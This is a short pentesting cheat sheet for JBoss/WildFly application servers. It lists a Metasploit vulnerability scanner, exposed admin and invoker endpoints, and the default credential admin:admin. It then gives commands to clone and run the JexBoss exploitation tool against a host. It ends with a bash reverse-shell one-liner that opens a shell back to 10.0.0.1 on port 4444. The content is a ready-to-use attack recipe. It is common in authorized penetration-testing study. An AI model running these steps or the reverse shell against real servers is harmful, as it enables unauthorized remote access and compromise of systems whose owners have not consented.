JBOSS Pentesting
Last modified: 2023-03-29
Web
JBOSS AS (Application Server), also known as WildFly, is an application server which is written in Java.
Enumeration
msfconsole
msf > use auxiliary/scanner/http/jboss_vulnscan
Common Directories
/admin-console/
/invoker/JMXInvokerServlet
/jbossws/
/jmx-console/
/jmx-console/HtmlAdaptor
/management
/manager
/status?full=true
/web-console/
/web-console/Invoker
/web-console/ServerInfo.jsp
Default Credentials
admin:admin
Exploitation
JexBoss is available as an exploitation CLI tool.
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip3 install -r requirements.txt
python3 jexboss.py -host https://example.com:8080
# Reverse Shell
Shell> /bin/bash -i > /dev/tcp/10.0.0.1/4444 0>&1 2>&1